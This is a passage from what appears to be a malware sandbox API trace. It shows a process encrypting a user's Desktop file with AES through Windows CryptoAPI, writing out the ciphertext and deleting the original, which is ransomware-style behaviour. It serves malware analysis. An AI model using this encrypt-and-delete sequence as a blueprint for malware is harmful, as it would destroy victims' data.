lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x135da) returned 0x49aa010 [0134.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0134.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2810 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0134.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0134.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0134.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x135da) returned 0x49d0be0 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0134.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0134.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0134.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0134.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0134.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0134.647] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0134.647] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.647] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0134.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.648] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0134.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0134.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0134.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0134.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0134.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0134.649] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e29d0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e29d0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0134.649] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.649] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0134.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb120, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0134.649] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x135da, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x135e0) returned 1 [0134.650] CharLowerBuffW (in: lpsz="byte[79329]", cchLength=0xb | out: lpsz="byte[79329]") returned 0xb [0134.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0134.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb3f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0134.650] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e538*=0x135da, dwBufLen=0x135e0 | out: pbData=0x48f0048*, pdwDataLen=0x144e538*=0x135e0) returned 1 [0134.650] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0134.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0134.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.651] WriteFile (in: hFile=0x258, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x135e0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144ef3c*=0x135e0, lpOverlapped=0x0) returned 1 [0134.653] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0134.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cadc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0134.654] CryptDestroyKey (hKey=0x41ac740) returned 1 [0134.701] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0134.701] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0134.701] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.701] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0134.701] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0134.701] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.701] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.701] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.701] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0134.702] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0134.702] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0134.702] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.702] FreeLibrary (hLibModule=0x756e0000) returned 1 [0134.702] CloseHandle (hObject=0x2a0) returned 1 [0134.702] CloseHandle (hObject=0x258) returned 1 [0134.705] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\MjT96UMRMqqhF.swf", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\MjT96UMRMqqhF.swf", lpFilePart=0x0) returned 0x36 [0134.705] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\MjT96UMRMqqhF.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\mjt96umrmqqhf.swf")) returned 0x20 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0134.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392538 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431daa0 [0134.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a500 [0134.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0134.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0134.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431daa0 | out: hHeap=0x1780000) returned 1 [0134.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0134.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0134.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0134.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392538 | out: hHeap=0x1780000) returned 1 [0134.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0134.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0134.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0134.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0134.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0134.706] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\MjT96UMRMqqhF.swf", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c95190, ftCreationTime.dwHighDateTime=0x1d5eb3f, ftLastAccessTime.dwLowDateTime=0x8d217aa0, ftLastAccessTime.dwHighDateTime=0x1d5e245, ftLastWriteTime.dwLowDateTime=0x8d217aa0, ftLastWriteTime.dwHighDateTime=0x1d5e245, nFileSizeHigh=0x0, nFileSizeLow=0x135da, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="MjT96UMRMqqhF.swf", cAlternateFileName="MJT96U~1.SWF")) returned 0x41ac200 [0134.706] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\MjT96UMRMqqhF.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\mjt96umrmqqhf.swf")) returned 1 [0134.707] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c95190, ftCreationTime.dwHighDateTime=0x1d5eb3f, ftLastAccessTime.dwLowDateTime=0x8d217aa0, ftLastAccessTime.dwHighDateTime=0x1d5e245, ftLastWriteTime.dwLowDateTime=0x8d217aa0, ftLastWriteTime.dwHighDateTime=0x1d5e245, nFileSizeHigh=0x0, nFileSizeLow=0x135da, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="MjT96UMRMqqhF.swf", cAlternateFileName="MJT96U~1.SWF")) returned 0 [0134.707] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d938 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0134.708] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0134.708] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0134.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0134.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0134.709] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 